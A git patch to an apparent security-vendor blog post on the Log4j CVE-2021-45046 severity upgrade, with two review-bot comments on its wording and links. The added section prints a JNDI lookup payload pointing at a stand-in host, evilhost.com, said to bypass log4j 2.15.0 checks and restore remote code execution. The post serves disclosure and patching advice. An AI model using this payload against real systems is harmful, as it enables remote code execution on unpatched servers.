From 0f47f256e0bf145a89969290b4559fca12ee393f Mon Sep 17 00:00:00 2001 From: Free Wortley Date: Fri, 17 Dec 2021 03:41:43 -0600 Subject: [PATCH] Add bypass payload to post --- docs/blog/2021-12-18-log4j-update-increased-cvss.mdx | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx b/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx index 93f30a77b..d5a30c666 100644 --- a/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx +++ b/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx @@ -42,6 +42,8 @@ _The logo gets worse as the situation gets worse..._ Earlier today, the second Log4j vulnerability (CVE-2021-45046) was upgraded from a [CVSS score of 3.7](https://web.archive.org/web/20211215180723/https://logging.apache.org/log4j/2.x/security.html) (limited DOS) to a [CVSS score of 9.0](https://logging.apache.org/log4j/2.x/security.html) (limited RCE). +See the bottom of this post for an example exploit payload that bypasses the checks in log4j 2.15.0. + **Just trying to patch Log4Shell? Please read our dedicated [Mitigation Guide](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/).** @@ -125,6 +127,16 @@ list, a full RCE is possible in the above code as we can access `attacker.com` n It is strongly recommended that you update to 2.16.0, even if you have previously updated to 2.15.0, to mitigate these new bypasses. +## Update: The localhost Bypass was Discovered! + +It was [posted](https://twitter.com/marcioalm/status/1471740771581652995) on Twitter by Márcio Almeida early on +December 17th. + +This payload will bypass the network host restrictions in log4j 2.15.0 and allow full RCE again: +``` +${jndi:ldap://127.0.0.1#evilhost.com:1389/a} +``` + ## Stay Updated Please follow us on [Twitter](https://twitter.com/LunaSecIO) or add yourself to our mailing list below, and we'll
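Review bot: The added line in the first hunk, "See the bottom of this post for an example exploit payload that bypasses the checks in log4j 2.15.0.", points at "the bottom of this post", but the second hunk inserts the new section above "## Stay Updated", so the payload is not at the bottom. A positional reference like this breaks as soon as the post is extended again; link to the new heading instead, e.g. "See [the localhost bypass section](#update-the-localhost-bypass-was-discovered) for an example payload that bypasses the checks in Log4j 2.15.0." Also, "log4j" here is lowercase while the surrounding paragraph writes "Log4j"; keep one spelling.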
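Review bot: The new "Update: The localhost Bypass was Discovered!" section in the second hunk states the bypass but not the remediation; a reader landing on this heading from the link added earlier in the post never sees the fix. Repeat the recommendation that already appears just above the hunk, e.g. "This is fixed in 2.16.0; 2.15.0 is not sufficient.", directly after the payload. Two smaller points: "It was [posted](...) on Twitter ..." opens the section with a pronoun whose only antecedent is the heading, so write "The bypass was posted ..." instead; and the code fence around the payload has no language tag, so add one (`text` is fine) to match the other fences in the docs. The heading capitalization ("The localhost Bypass was Discovered") is also inconsistent with the rest of the post's headings.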